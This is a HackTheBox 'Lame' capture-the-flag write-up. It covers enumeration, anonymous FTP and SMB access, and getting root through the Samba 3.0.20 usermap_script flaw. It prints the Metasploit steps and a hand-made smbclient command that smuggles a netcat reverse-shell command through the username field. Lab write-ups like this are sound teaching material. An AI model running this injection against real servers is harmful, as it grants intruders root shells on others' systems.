HTB: Lame

...

Intro:

Man, this box really does live up to it's name... This box was the be-all-end-all of beginner boxes. A nice chill box to do while you're on your beach vacation. It was quite literally half the challenge as you'll see in a bit.

Recon:

Pulling the classic nmap -sT -sV -A -v <ip> gives us a couple ports: 21, 22, 139, and 445. First off, no web :( That's alright because our nmap scan shows us an ftp, ssh, and a samba server!

A somewhat provocative nmap scan result; Showing anonymous logins

Finds 'n Fails:

Firstly we grab that low-hanging fruit named "vsftpd", which permits anonymous logins. Poking around yields nothing but an empty directory. We can check the version number in Exploit DB, which yields a backdoor exploit. The exploit opens a shell on TCP port 6200 when a user logging in with a specific username. [1][2]. The references I've found are somewhat contradictory as one site says the username must start with a ':)', but another exploit ends the username with ':)'. Either way, trying to exploit the server is futile because the attack just hangs the commands.

Moving on to the smb servers, we find they too allow anonymous logins: smbclient -L <ip>; [Enter]. Man, these admins just really aren't trying, eh? Listing all the shares on the server shows us an interesting one, "/tmp", boasting the comment: "on noes!".

Listing the shares via smbclient

Checking out the /tmp share, there's nothing of interest here. We ARE able to upload a file, in this case a bash reverse shell, but we hit another dead end with no way of executing the file.

Getting Use- er... Root?:

Checking the listed shares again shows us the OS version. This info is also present in the nmap scan, but let's not get too crazy here. We're dealing with a "Samba 3.0.20-Debian" server. Once again, checking Exploit DB yields us an RCE via Metasploit [3]. Running Metasploit finally lands us a shell:
msfconsole
use exploit/multi/samba/usermap_script
<set relevant options>
exploit

Running "whoami" reveals that we have in fact gotten a root shell right off the bat! Listing /home shows us the "makis" directory, who's in posession of the user flag. Next we move over to /root to grab the root flag. Easy peasy!

Anit-MSF:

Sometimes Metasploit is very nice! Personally, it makes me feel ultra script kiddie. Don't even get me started on meterpreter! Just give me a shell and let me hack! We can remove MSF from the equation by reading the exploit's ruby file. Right down at the bottom, we can see that all the exploit does is pass a specific string as username, which allows us to execute code. Using this knowledge (and a bit of an explanation POST SOLVE from an article I can no longer find) we can craft our own exploit: sleep 1 && smbclient -L <target ip> -U '/`nohup nc <local ip> 3184 -e $(base64 -d <<< "L2Jpbi9iYXNoCg==")`' <<< "" & nc -lvp 3184 [4]. This command passes a command substitution string as the username (the backticks), with "nohup" telling the machine to ignore logout signals which would end the process. We then run a netcat reverse shell. We find that we can't simply tell netcat to execute /bin/bash because it causes all the characters before "/bash" to become uppercase. To remediate this, we tell netcat to execute a string which will be decoded from base64, the string being "/bin/bash". Just like that we now have a manual exploit!




Resources:

MITRE CVE-2011-2523 [EXTERNAL]


Vigilance explanation of CVE-2011-2523 [EXTERNAL]


Metasploit Exploit vsftpd 2.3.4 [EXTERNAL]


Samba exploit




Last edit: 2021.08.24